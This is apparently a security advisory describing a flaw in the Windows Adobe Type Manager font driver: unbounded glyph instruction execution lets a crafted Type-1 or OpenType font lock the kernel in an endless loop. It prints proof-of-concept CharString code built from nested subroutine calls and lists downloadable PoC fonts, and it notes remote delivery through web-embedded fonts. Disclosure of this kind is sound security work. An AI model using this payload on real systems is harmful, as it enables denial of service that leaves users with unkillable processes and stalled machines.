The Adobe Type Manager Font Driver (ATMFD.DLL) used by the Windows kernel to handle Type1 (.PFB + .PFM) and OpenType (.OTF) fonts does not limit the number of state machine instructions which can be executed per glyph, while e.g. FreeType set the maximum to 20'000'000.

By using multiple nested calls of subroutines and computationally expensive operations (such as drawing outlines), it is possible to cause ATMFD.DLL to get stuck in the main VM execution loop forever, thus consuming 100% of a single CPU (can be scaled to attack multiple CPUs) and implicitly creating an unkillable process.

The issue is reproducible with both Type-1 and OTF fonts on all Microsoft Windows editions (up to 8.1), regardless of bitness. The most obvious attack scenario would be to conduct the attack locally, but since CSS allows arbitrary OTF fonts to be embedded in websites, this can be potentially exploited in a remote manner in the context of browsers which use GDI for font rasterization. Other remote vectors (e.g. through PDF / Office documents) might also be viable, but have not been investigated.

The following CharString code causes 65536 drawing operations to be performed, which is sufficient to demonstrate the attack on any modern machine:

          <CharString index="40">
            -100 0 rmoveto 100 100 rlineto 0 -100 rlineto return
          </CharString>
          <CharString index="41">
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            -67 callsubr -67 callsubr -67 callsubr -67 callsubr
            return
          </CharString>
          <CharString index="42">
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            -66 callsubr -66 callsubr -66 callsubr -66 callsubr
            return
          </CharString>
          <CharString index="43">
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            -65 callsubr -65 callsubr -65 callsubr -65 callsubr
            return
          </CharString>
          <CharString index="44">
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            -64 callsubr -64 callsubr -64 callsubr -64 callsubr
            return
          </CharString>
[...]
        <CharString name="A">
          100 0 rmoveto -63 callsubr endchar
        </CharString>

Attached are the following POC files:

1) The source code of an OTF file (poc.ttx) and the resulting font (poc.otf) compiled with the "ttx" utility, a part of an open-source "fonttools" project (https://github.com/behdad/fonttools/).

2) The source code of a Type-1 font (poc.pfa) and the resulting font (poc.pfb, poc.pfm) compiled with the "type1" utility, a part of the "Adobe Font Development Kit for OpenType" software package (http://www.adobe.com/devnet/opentype/afdko/topic_overview.html).
 

poc.pfb 20.0 KB Download

poc.otf 7.6 KB Download

poc.pfm 668 bytes Download

poc.ttx 99 KB Download

poc.pfa 54.9 KB Download